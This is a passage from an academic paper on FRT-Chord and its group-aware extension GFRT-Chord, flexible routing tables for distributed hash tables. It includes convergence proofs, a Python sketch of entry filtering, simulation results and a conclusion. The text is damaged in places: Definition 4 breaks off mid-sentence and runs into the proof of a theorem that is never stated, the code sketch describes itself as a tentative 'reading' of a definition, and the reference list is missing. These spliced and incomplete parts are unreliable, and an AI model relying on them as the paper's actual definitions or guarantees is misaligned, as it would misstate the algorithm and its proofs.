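Inserting an interior entry splits one spacing into two smaller ones, and the merged spacing created by filtering is at most the minimum pair sum, which is bounded by the split spacing; hence the worst spacing is monotonically non-increasing.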
**Theorem 4** means that FRT-Chord continually refines a routing table through repeated entry learning and entry filtering.
In FRT-Chord, routing table refinement through repeated entry learning and entry filtering may stop, namely when every newly learned entry is itself selected as the entry to remove. Such a routing table $E$ is called a convergent routing table, and the following theorem holds.
**Theorem 5:** Assuming that all nodes have convergent routing tables with $O(\log N)$ entries in an $N$-node network, path lengths are $O(\log N)$ with high probability.
**Proof:** Let $J$ be the set of indices $i$ such that some node exists in the range from $e_i$ to $e_{i+1}$, and let $K$ be the set of the remaining indices. From the definition of convergent routing tables, for any $j \in J$, an entry inserted between $e_j$ and $e_{j+1}$ would be removed, and the following inequality holds.
$$S^E_j \leq S^E_{i-1} + S^E_i, \quad (j \in J, i=2, \ldots, |E| - 1) \quad (26)$$
Thus, by aggregating (26) over $i$,
$$(|E| - 2) \, S^E_j \leq \sum_{i=2}^{|E| - 1} (S^E_{i-1} + S^E_i) \leq 2 \sum_{i=1}^{|E| - 1} S^E_i, \quad (27)$$
so
$$S^E_j \leq \frac{2 \sum_{i=1}^{|E| - 1} S^E_i}{|E| - 2} = \frac{2}{|E| - 2} \log \frac{d(s, e_{|E|})}{d(s, e_1)}. \quad (28)$$
According to the definitions of $r_j(E)$ and $S^E_j$, and bounding $d(s, e_{|E|})/d(s, e_1) < N^2$ with high probability as in the proof of Theorem 1, we obtain:
$$r_j(E) < 1 - \left( \frac{1}{N} \right)^{\frac{4}{|E| - 2}}. \quad (29)$$
When we consider the upper limit of the path length needed to reduce the remaining distance to $2^m/N$ or less, we must focus on the case where each node forwards to some $e_j$ $(j \in J)$, because for $k \in K$ there is no node between $e_k$ and $e_{k+1}$, and query forwarding stops once the query is forwarded to $e_k$.
From (29), path lengths are $O(\log N)$ by similar reasoning to the proof of Theorem 1.
When we wish to set the length of the successor list to $c$ $(c > 1)$, we need only add those entries as sticky entries. In this case, the entry to remove is still selected optimally by the same filtering method, and routing tables are refined continuously through entry learning and entry filtering.
As a result, we can summarize entry filtering in FRT-Chord as follows.
1) Substitute entries in $E$ into $C$.
2) Remove sticky entries from $C$.
3) Select the entry $e_{i^*}$ from $C$ that minimizes $S^E_{i^*-1} + S^E_{i^*}$.
IV. EXTENSIONS OF FRT
Existing DHTs take node identifiers into account by putting restrictions on the candidates for node identifier combinations in a routing table, so as to keep path lengths short, e.g., $O(\log N)$ hops. To extend these DHTs, we must either construct routing tables under these restrictions or abandon the restrictions altogether, and thus the restrictions strongly limit opportunities to extend the algorithms.
An FRT-based algorithm, on the other hand, is able to flexibly reflect factors other than node identifiers in routing table construction, and consideration of node identifiers follows naturally because the algorithm expresses its policy for evaluating each routing table according to node identifiers as the order $\leq_{ID}$. The routing table is refined incrementally in terms of node identifiers even under restrictions from factors other than node identifiers. This is the aspect that most differs from other DHTs.
A. GFRT-Chord
Grouped FRT (GFRT) is an extension of FRT. GFRT reflects node groups in routing tables at each node $x$ by adding a policy to preferentially keep entries belonging to the same group as $x$ in the routing table. GFRT-Chord achieves reduction of hops between nodes belonging to different node groups while keeping path lengths short. For instance, we can reduce communications over ISPs or data centers by configuring them as node groups. In GFRT, each node $x$ belongs to a node group $x$.group, and a group identifier is attached to a node identifier, and thus each entry $e$ has node group information as $e$.group.
Like FRT-Chord, GFRT-Chord also consists of three parts: guarantee of reachability, entry learning, and entry filtering. It uses the same methods for guarantee of reachability and entry learning, and is characterized by its method of entry filtering.
1) Entry Filtering: GFRT-Chord maintains a group successor list and a group predecessor in a similar way to the successor list and predecessor in FRT-Chord. The group successor list and the group predecessor at a node $s$ mean a successor list and a predecessor, respectively, in the network restricted to nodes belonging to the same group as $s$. In GFRT-Chord, therefore, the sticky entries are the successor list, the predecessor, the group successor list, and the group predecessor.
We define the following variables for the routing table $E = \{e_i\}$ at a node $s$ (see Fig.6).
- $E_G = \{e \in E \mid e.\text{group} = s.\text{group}\}$.
- $E_{\bar{G}} = \{e \in E \mid e.\text{group} \neq s.\text{group}\}$.
- $e_o$ is the nearest entry in $E_G$ from $s$.
- $e_f$ is the farthest entry in $E_{\bar{G}}$ from $s$.
- $E_{near} = \{e_i \in E \mid d(s, e_i) < d(s, e_o)\}$.
- $E_{far} = \{e_i \in E \mid d(s, e_o) \leq d(s, e_i) < d(s, e_{|E|})\}$.
- $E_{leap} = E_{far} \cap E_{\bar{G}}$.
Using the variables defined above, GFRT-Chord performs entry filtering as follows:
1) Substitute $E_{\bar{G}}$ into $C$ if $E_{leap} \neq \emptyset$, otherwise substitute $E$ into $C$.
2) Remove sticky entries from $C$.
3) Select the entry $e_{i^*}$ from $C$ that minimizes $S^E_{i^*-1} + S^E_{i^*}$.
As above, entry filtering in GFRT-Chord consists of the filtering steps of FRT-Chord with the addition of only one step. Step 1) in particular represents the policy of preferentially maintaining entries belonging to the same group. The other two steps are the same as in FRT-Chord, and they refine the routing table according to the order $\leq_{ID}$. Thus, GFRT-Chord reflects node identifiers in routing table construction after reflecting node groups. In this way, the filtering steps in GFRT-Chord reflect node identifiers and node groups simultaneously.
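The filtering steps above can be sketched as follows (a hedged illustration based on our reading of $E_{leap}$ as the far entries belonging to other groups; group labels, entry values, and the ring size are hypothetical):

```python
# Hedged sketch of GFRT-Chord-style entry filtering (our reading).
import math

M = 16
RING = 1 << M

def d(s, t):
    return (t - s) % RING

def gfrt_filter_index(s, table, groups, my_group):
    """Index to remove from `table` (entries sorted by d(s, .));
    `groups[i]` is the group of table[i]."""
    S = [math.log2(d(s, table[i + 1]) / d(s, table[i]))
         for i in range(len(table) - 1)]
    non_sticky = set(range(1, len(table) - 1))   # keep successor/predecessor
    same = {i for i in non_sticky if groups[i] == my_group}
    # e_o: nearest same-group entry; leap entries are other-group entries
    # at or beyond e_o (our reading of E_leap = E_far ∩ E_not-G).
    e_o = min((i for i, g in enumerate(groups) if g == my_group), default=None)
    leap = {i for i in non_sticky - same if e_o is not None and i >= e_o}
    cand = (non_sticky - same) if leap else non_sticky
    # Within the candidates, fall back to FRT-Chord's spacing rule.
    return min(cand, key=lambda i: S[i - 1] + S[i])
```

When leap entries exist, removal candidates are limited to entries of other groups, so same-group entries are kept preferentially; the final choice among the candidates still minimizes $S^E_{i-1} + S^E_i$.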
Hereafter, for convenience, we set the lengths of the successor list and the group successor list to 1. Theorem 6 then holds, as in FRT-Chord.
**Theorem 6:** Let $E^* = E \setminus \{e_{i^*}\}$ be the routing table filtered by removing $e_{i^*}$ according to the filtering operation of GFRT-Chord. For any entry $e_i$ other than sticky entries, (30) and (31) hold.
$$\frac{|E^*_{far}| - |E^*_{leap}|}{|E^*_{far}|} \geq \frac{|E_{far}| - |E_{leap}|}{|E_{far}|} \quad (30)$$
$$E^* \leq_{ID} E \setminus \{e_i\} \quad (31)$$
**Proof:** We will prove Theorem 6 in two parts.
1) When $E_{leap} = \emptyset$, (30) holds. (31) also holds because we can apply the proof of Theorem 3.
2) When $E_{leap} \neq \emptyset$: since GFRT-Chord selects an entry $e_{i^*}$ from $E_{far}$ if and only if $e_{i^*} \in E_{leap}$, according to the first step of entry filtering, $|E_{far}|$ decreases by one if and only if $|E_{leap}|$ decreases by one. So $|E_{far}|$ will not decrease without removing an entry from $E_{leap}$. Thus, (30) holds. (31) also holds because we can apply the proof of Theorem 3 under the restriction of the first step.
In Theorem 6, (30) and (31) mean that the entry filtering reflects both node groups, through the ratio of entries belonging to the same group as $s$, and node identifiers, through the order $\leq_{ID}$. Therefore, Theorem 6 represents simultaneous consideration of node groups and node identifiers.
We define a group localized routing table at a node $s$ as follows:
**Definition 4:** Let $E$ be a group localized routing table at a node $s$ belonging to a group $G_s$. When the node forwards a
query with $E$, hops to nodes belonging to groups other than $G_s$ are bounded. Forwarding toward a target $t$ then takes $O(\log N)$ hops by similar logic to the proof of Theorem 5, and therefore the path length is $O(\log N)$.
B. Extendibility of FRT
We can easily design such extended algorithms because FRT offers a simple way to reflect node identifiers within a design methodology composed of three parts, guarantee of reachability, entry learning, and entry filtering, by defining a total order $\leq_{ID}$ on the routing table set. Importantly, FRT replaces the question of how we should construct routing tables with the question of which entries we should remove from the routing table. In the rest of this section, we demonstrate the extendibility of FRT, taking GFRT-Chord as an example.
When we designed GFRT-Chord, we first decided to maintain some nodes in the routing table, such as the successor list, the predecessor, the group successor list, and the group predecessor. These are the sticky entries. DHTs often define exceptional entries to maintain in order not only to guarantee reachability but also to achieve fault tolerance, localize communications, or replicate data efficiently. FRT is designed to not interfere with such constraints for a routing table with sticky entries and offers a way to exclude these entries through entry filtering. No matter what entries we define as sticky entries, entry filtering can reflect node identifiers because the order on routing tables can be applied to any subset of the routing table set.
When we designed GFRT-Chord, we adopted the policy that it is better for a routing table at a given node to maintain more nodes belonging to the same group as that node. Factors we wish to introduce into routing algorithms are often independent of node identifiers, because node identifiers are determined without regard to node characteristics, yet we must integrate such factors and node identifiers into one algorithm. FRT facilitates resolution of this difficulty: it converts rigid data structures that are hard to deal with into a single routing table by defining the order $\leq_{ID}$ on candidates for the routing table. As a result, we can easily introduce factors other than node identifiers into routing algorithms by considering not how to keep better combinations of node identifiers, but how nodes should be maintained based on those factors.
On the other hand, it is not always true that path length accurately represents routing efficiency, due to factors other than node identifiers. Rather, node identifiers should be maximally reflected in routing tables after sufficient reflection of other factors. FRT provides this ability by detaching the concern of node identifiers from the data structure, i.e., the routing table, in the form of the order $\leq_{ID}$.
V. EVALUATION
We implemented FRT-Chord on Overlay Weaver [16], [17], an overlay construction toolkit, and performed experiments.
A. Entry Learning and Entry Filtering in FRT-Chord
Here we will show that routing tables will approach the best routing table by entry learning and entry filtering, and confirm the effectiveness of transferring at join and active learning lookups.
In the experiments, the routing table size $L$ is 80 and the number of identifier bits $m$ is 160. We successively sent $10^5$ queries, each to a key chosen at random by a node chosen at random, in a system with $N = 10^4$ nodes. Next, we added a single node to the system and had it send $10^2$ queries, either to randomly chosen keys or according to active learning lookups. We adopted an iterative routing style in all experiments, like EpiChord [9]: the first node on a path forwards a query by repeatedly asking the current node for the next node.
We varied whether each joining node receives an entire routing table from a successor (transferring at join) or not, and recorded node identifiers of entries in a routing table at the last joined node. We plotted $\log d(s, e_i)$, the logarithmic distance from the node to each entry in its routing table after 25 queries and 100 queries, using its best routing table as a guide (Fig.7, Fig.8). The closer the graph of an experimental routing table is to the best routing table, the better its learning method. Fig.7 and Fig.8 show that routing tables approach the best routing table through repeated entry learning and entry filtering.
Fig.7 and Fig.8 also show that transferring at join and active learning lookups perform well because the routing tables without them are quite different from their best routing table. By comparing routing table learning only by random lookups to routing table learning by transferring at join along with random lookups, we can see that transferring at join is effective. This is because the node learns more entries by transferring from the successor in joining, and the best routing table for a node is similar to the best routing table of its successor. On the other hand, we can also see that even if a routing table does not obtain entries through a transfer at join, the routing table can still approach the best routing table through active learning lookups.
When we compare Fig.7 to Fig.8, we can see that routing tables with active learning lookups approach the best routing table more quickly than the others. This means that active learning lookups are efficient for learning as compared with random lookups.
These results show that transferring at join and active learning lookups work efficiently for learning, and entry filtering also works as expected.
B. Learning and Path Lengths in FRT-Chord
After \( N \) nodes join an FRT-Chord system, we repeat sending a query 50\( N \) times, where each query is sent to a randomly chosen key by a randomly chosen node. This means that the average number of queries sent by a node is 50. We vary the number of nodes \( N \) and the routing table size \( L \) and we set the length of the successor list as 4.
Fig.9 plots the average path length for every $N$ queries. The figure shows that repeated lookups shorten the average path length, and do so over almost the same range regardless of the number of nodes in the system. Thus, entry learning and entry filtering in FRT-Chord scale with the number of nodes.
C. Path Lengths and the Number of Nodes in FRT-Chord
We varied \( N \) and \( L \), and measured path lengths after routing tables had been sufficiently refined. Fig.10a and Fig.10b plot the average and the 99th percentile of path lengths. These figures show that FRT-Chord achieves \( O(\log N) \)-hop lookup performance, as described by Theorem 5. We can also confirm that the trade-off between \( L \) and path lengths is tunable. When \( L > N \) \((N = 10^2, L = 160)\), routing tables contain all nodes in the system and FRT-Chord achieves \( O(1) \)-hop lookup performance.
D. Path Lengths in GFRT-Chord
We also implemented GFRT-Chord on Overlay Weaver. Experiments with the implementation showed that average path lengths grow slightly as compared with FRT-Chord.
\( N \) nodes joined the system, and the nodes were divided into \(|G|\) groups of \( N/|G| \) nodes each. Each node repeated an active learning lookup 500 times. The variables \( N \), \(|G|\), and \( L \) were varied. The successor list length and the group successor list length were set to 4.
Fig.11a and Fig.11b plot average path lengths and average group path length. A group path length is the number of hops between two nodes belonging to different groups in a path, and thus a group path length is smaller than a path length.
In Fig.11a and Fig.11b, average path lengths in GFRT-Chord are larger than in FRT-Chord. This is because routing table construction in GFRT-Chord operates under the restriction of node groups, unlike FRT-Chord. In every situation, however, they differ only slightly, because the restriction of node groups in GFRT-Chord is not overly rigid and FRT is able to balance node identifier considerations and node group considerations in parallel. For example, for \(|G| = 10 \) and \( L = 20 \), when \( N = 10^2 \) each node group has only 10 nodes and the routing table includes at most 10 nodes belonging to the same group. GFRT-Chord does not try to maintain the ratio of same-group entries to other entries, but it uses the rest of the routing table maximally and refines the entries according to the order \( \leq_{ID} \). GFRT-Chord therefore experiences only 1% path length growth, while attaining a 22% group path length decrease. The specific percentages matter less than the trend: this experiment shows that path lengths do not become overly large due to consideration of node groups, in spite of the small number of nodes belonging to the same group. On the other hand, when \( N = 10^3 \) each node group has 100 nodes. GFRT-Chord is therefore able to choose entries belonging to the same group from a number of entry candidates according to the order \( \leq_{ID} \), and it treats entries not belonging to the same group likewise. In this situation, GFRT-Chord achieves only 6% path length growth, while decreasing group path length by 38%.
VI. Conclusion
This paper proposed flexible routing tables (FRT), a method to design routing algorithms for overlay networks, and proposed FRT-Chord, an FRT-based DHT.
An FRT-based algorithm is able to reflect node identifiers in routing table construction without restrictions on routing table candidates by defining and referring to a total order \( \leq_{ID} \) on a routing table set.
To analyze FRT-Chord, we implemented and experimented on the algorithm, and showed that the routing table is efficiently refined as expected, and that the algorithm achieves \( O(\log N) \)-hop lookup performance in an \( N \)-node network and \( O(1) \)-hop lookup performance in a small network.
This paper also proposed Grouped FRT (GFRT), an extended method based on FRT to reflect node groups, and designed GFRT-Chord, a GFRT-based DHT.
Experiments on GFRT-Chord show that it reduces the number of hops from one group to another while avoiding long paths. This demonstrates the extendibility of FRT-based algorithms, in that GFRT-Chord reflects node identifiers and node groups simultaneously.
We are finishing the design of FRT-Kademlia, an FRT-based DHT with an identifier space based on the XOR metric. In the future, we will design more FRT-based DHTs and extend them to deal with real-world problems in addition to node grouping.
References
Fig. 9. Change in average path length with the number of queries per node.
Fig. 10. Correlation between routing table size and path length.
Fig. 11. Average path length with average group path length (shaded portion).